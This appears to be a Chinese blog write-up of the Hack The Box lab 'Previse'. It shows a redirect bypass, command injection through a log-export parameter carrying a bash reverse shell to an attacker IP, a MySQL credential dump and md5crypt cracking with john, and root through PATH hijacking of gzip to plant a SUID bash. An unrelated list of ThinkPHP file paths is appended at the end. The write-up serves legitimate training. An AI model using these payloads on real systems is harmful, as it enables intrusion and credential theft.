Flowww's blog
htb previse复盘
FLow
  2024-09-13   2024-09-25  

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
─# nmap -A -p- --min-rate=1000 -T4 10.10.11.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-12 19:03 PDT
Nmap scan report for 10.10.11.104
Host is up (0.52s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-title: Previse Login
|_Requested resource was login.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=9/12%OT=22%CT=1%CU=42757%PV=Y%DS=2%DC=T%G=Y%TM=66E3
OS:9E0F%P=aarch64-unknown-linux-gnu)SEQ(SP=107%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=107%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53AST11NW7%O2=M53A
OS:ST11NW7%O3=M53ANNT11NW7%O4=M53AST11NW7%O5=M53AST11NW7%O6=M53AST11)WIN(W1
OS:=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O
OS:=M53ANNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N
OS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF
OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=
OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   414.58 ms 10.10.16.1
2   587.74 ms 10.10.11.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.33 seconds

只有22和80端口

web

先访问80端口,只有一个登陆口,尝试了密码爆破和sql注入,都不成功,后面看的官方对机器的描述是关于重定向的,扫到的nav.php,点到其他php都会定向会login.php。看一下bp历史包

可以看到返回包里有accounts.php的详细内容,但是状态码是302,我们尝试bp抓包后”Do interact”,修改返回包的状态码

这下就不会被重定向到login.php,可以看到正常的account页面

我们在这里新建一个用户,再正常登陆,登陆后就不会被重定向了

然后再download.php找到一个可以下载的压缩包SITEBACKUP.zip,下载下来是网站的源码,config.php可以看到mysql登陆账号密码,后面可以用,经过一番搜寻,在logs.php里面发现exec函数,里面的变量可控,大概率存在代码注入漏洞

找到导出log的php,抓到包

改变一下delim变量值

1
delim=%3bbash+-c+'bash+-i+>%26+/dev/tcp/10.10.16.4/1234+0>%261'%3b

成功反弹shell

提权

拿到第一反应是先登陆mysql

1
2
3
4
5
6
www-data@previse:/var/www/html$ mysql -u root -p'mySQL_p@ssw0rd!:)' -e 'use previse;select * from accounts;'
<ssw0rd!:)' -e 'use previse;select * from accounts;'
mysql: [Warning] Using a password on the command line interface can be insecure.
id      username        password        created_at
1       m4lwhere        $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.        2021-05-27 18:18:36
2       admin   $1$🧂llol$G3KunFyMrVvsqYP1JpRi70        2024-09-13 02:06:23

拿到 m4lwhere的加盐密码,还要看到他是什么类型的哈希

然后在accounts.php源码找到存储逻辑

Crypt()函数,md5加密来的,于是指定john的爆破格式

1
john hash --wordlist=/home/kali/Desktop/rockyou.txt --format=md5crypt-long

最后拿到密码ilovecody112235!登陆m4lwhere

第一件事sudo -l,找到一个可以用的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere: 
User m4lwhere may run the following commands on previse:
    (root) /opt/scripts/access_backup.sh
m4lwhere@previse:~$ ls -l /opt/scripts/access_backup.sh
-rwxr-xr-x 1 root root 486 Jun  6  2021 /opt/scripts/access_backup.sh
m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz

没有修改权限,第一反应是修改环境变量,里面用到gzip

1
2
3
4
5
cd /tmp
echo -ne '#!/bin/bash\ncp /bin/bash /tmp/bash\nchmod 4755 /tmp/bash' > gzip
chmod +x gzip
export PATH=/tmp:$PATH
sudo /opt/scripts/access_backup.sh

提权成功

总结

真感觉htb质量高,难度适中,什么知识点都需要,最开始重定向分析那个算是基础,这次复盘下来也是加深了印象,拿到源码后审计这块真需要耐心。。。

\server\index.php
\server\simplewind\Core\ThinkPHP.php
\server\simplewind\Core\Library\Think\Think.class.php
\server\simplewind\Core\Library\Think\Storage.class.php
\server\simplewind\Core\Library\Think\Storage\Driver\File.class.php
\server\simplewind\Core\Mode\common.php
\server\simplewind\Core\Common\functions.php
\server\application\Common\Common\function.php
\server\simplewind\Core\Library\Think\Hook.class.php
\server\simplewind\Core\Library\Think\App.class.php
\server\simplewind\Core\Library\Think\Dispatcher.class.php
\server\simplewind\Core\Library\Think\Route.class.php
\server\simplewind\Core\Library\Think\Controller.class.php
\server\simplewind\Core\Library\Think\View.class.php
\server\simplewind\Core\Library\Behavior\BuildLiteBehavior.class.php
\server\simplewind\Core\Library\Behavior\ParseTemplateBehavior.class.php
\server\simplewind\Core\Library\Behavior\ContentReplaceBehavior.class.php
\server\simplewind\Core\Conf\convention.php
\server\application\Common\Conf\config.php
\server\data\conf\db.php
\server\data\conf\config.php
\server\data\conf\route.php
\server\application\Common\Conf\alias.php
\server\application\Common\Conf\tags.php
\server\simplewind\Core\Lang\zh-cn.php
\server\simplewind\Core\Conf\debug.php
\server\application\Common\Conf\debug.php
\server\application\Common\Behavior\InitHookBehavior.class.php
\server\simplewind\Core\Library\Think\Behavior.class.php
\server\simplewind\Core\Library\Think\Cache.class.php
\server\simplewind\Core\Library\Think\Cache\Driver\File.class.php
\server\application\Common\Common\extend.php
\server\application\Portal\Conf\config.php
\server\application\Portal\Common\function.php
\server\simplewind\Core\Library\Behavior\ReadHtmlCacheBehavior.class.php
\server\simplewind\Core\Library\Behavior\CheckLangBehavior.class.php
\server\application\Common\Lang\zh-cn.php
\server\application\Portal\Controller\IndexController.class.php
\server\application\Common\Controller\HomebaseController.class.php
\server\application\Common\Controller\AppframeController.class.php
\server\simplewind\Core\Library\Think\Template.class.php
\server\simplewind\Core\Library\Think\Template\TagLib\Cx.class.php
\server\simplewind\Core\Library\Think\Template\TagLib.class.php
\server\application\Common\Lib\Taglib\TagLibSpadmin.class.php
\server\application\Common\Lib\Taglib\TagLibHome.class.php
\server\application\Portal\Lib\Taglib\Portal.class.php
\server\data\runtime\Cache\Portal\5c2fc9f3dd331fb0470c86f0c6552505.php
\server\simplewind\Core\Library\Think\Model.class.php
\server\simplewind\Core\Library\Think\Db.class.php
\server\simplewind\Core\Library\Think\Db\Driver\Mysql.class.php
\server\simplewind\Core\Library\Think\Db\Driver.class.php
\server\simplewind\Lib\Util\Tree.class.php
\server\simplewind\Core\Library\Behavior\WriteHtmlCacheBehavior.class.php
\server\application\Common\Behavior\TmplStripSpaceBehavior.class.php
\server\simplewind\Core\Library\Behavior\ShowPageTraceBehavior.class.php

  1. 1. 信息搜集
  2. 2. web
  3. 3. 提权
  4. 4. 总结
© 2020 - 2024    FLow
由 Hexo 驱动 & 主题 Keep
  1. 1. 信息搜集
  2. 2. web
  3. 3. 提权
  4. 4. 总结